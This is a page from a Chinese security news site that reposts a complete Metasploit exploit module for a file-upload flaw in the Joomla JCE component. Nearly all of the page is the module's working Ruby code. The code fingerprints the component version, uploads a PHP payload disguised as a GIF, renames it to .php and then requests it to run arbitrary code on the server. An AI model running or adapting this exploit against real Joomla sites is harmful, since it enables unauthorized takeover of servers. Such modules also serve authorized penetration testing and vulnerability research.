首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla Component JCE File Upload Remote Code Execution
来源:metasploit.com 作者:temp66 发布时间:2013-03-27  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::FileDropper

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Joomla Component JCE File Upload Remote Code Execution',
			'Description'    => %q{
					This module exploits a vulnerability  in the JCE component for Joomla!, which
			could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
			fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
			request, a remote attacker could exploit this vulnerability to upload a malicious PHP
			script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
			system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
			1.5.26.
			},
			'Author'         =>
				[
					'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
					'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					['BID', '49338'],
					['EDB', '17734']
				],
			'Payload'        =>
				{
					'Space'       => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
					'DisableNops' => true,
					'BadChars'    => "#",
					'Keys'        => ['php']
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'Privileged'     => false,
			'DisclosureDate' => 'Aug 2 2012',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
				], self.class)
	end


	def get_version
		# check imgmanager version
		@uri_base 		= normalize_uri(target_uri.path.to_s, 'index.php')
		@vars_get_base 	=  	{
			'option'=> 'com_jce',
			'task'  => 'plugin',
			'plugin'=> 'imgmanager',
			'file'  => 'imgmanager'
		}
		print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
		res = send_request_cgi({
			'uri' 	  => @uri_base,
			'vars_get' => @vars_get_base,
			'method'  => 'GET',
			'version' => '1.1'
		})

		version = nil
		if (res and res.code == 200)
			res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
			version = $1.nil? ? nil : $1
		end

		return version
	end

	def check
		version = ( get_version || '').to_s

		if (version.match(%r{1\.5\.7\.1[0-4]?}))
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end


	def upload_gif
		# add GIF header
		cmd_php = "GIF89aG\n<?php #{payload.encoded}  ?>"

		# Generate some random strings
		@payload_name  	= rand_text_alpha_lower(6)
		boundary   		= '-' * 27 + rand_text_numeric(11)

		parms 			= {'method'=> 'form'}
		parms.merge!(@vars_get_base)

		# POST data
		post_data = Rex::MIME::Message.new
		post_data.bound = boundary
		post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
		post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
		post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
		post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
		post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
		post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")

		data = post_data.to_s

		res = send_request_cgi({
			'uri'	  	=> @uri_base,
			'vars_get' 	=> parms,
			'method'  	=> 'POST',
			'version' 	=> '1.1',
			'data'    	=> data,
			'ctype'  	=> "multipart/form-data; boundary=#{post_data.bound}"
		})

		if (res and res.code = 200 )
			return :access_denied if (res.body =~ /RESTRICTED/i)
			print_good("Successfully uploaded #{@payload_name}.gif")
		else
			print_error("Error uploading #{@payload_name}.gif")
			return :abort
		end

		return :success

	end

	def renamed?
		# Rename the file from .gif to .php

		data =	"json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"

		print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")

		res = send_request_cgi(
			{
				'uri'       => @uri_base,
				'vars_get'	=> @vars_get_base,
				'method'    => 'POST',
				'version'   => '1.1',
				'data' 	    => data,
				'ctype'     => 'application/x-www-form-urlencoded; charset=utf-8',
				'headers'   =>
				{
					'X-Request' => 'JSON'
				}
			})
		if (res and res.code == 200 )
			print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
			return true
		else
			print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
			return false
		end
	end

	def call_payload
		payload = "#{@payload_name}.php"
		print_status("Calling payload: #{payload}")
		uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
		res = send_request_cgi({
			'uri'	=> uri,
			'method'    => 'GET',
			'version'   => '1.1'
		})
	end



	def exploit

		return if not check == Exploit::CheckCode::Vulnerable
		if upload_gif == :success
			if renamed?
				register_files_for_cleanup("#{@payload_name}.php")
				call_payload
			end
		end

	end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ruby Thumbshooter Gem 0.1.5 Re
·Konftel 300IP 2.1.2 Reboot Byp
·KNet Web Server Buffer Overflo
·Java CMM Remote Code Execution
·ActFax 5.01 RAW Server Buffer
·v0pCr3w Web Shell Remote Code
·HP Intelligent Management Cent
·BlazeDVD Free Edition 6.1.1.6
·Ra1NX PHP Bot Authentication B
·McAfee Virtual Technician (MVT
·Mitsubishi MX ActiveX Componen
·Konftel 300IP SIP-based Confer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved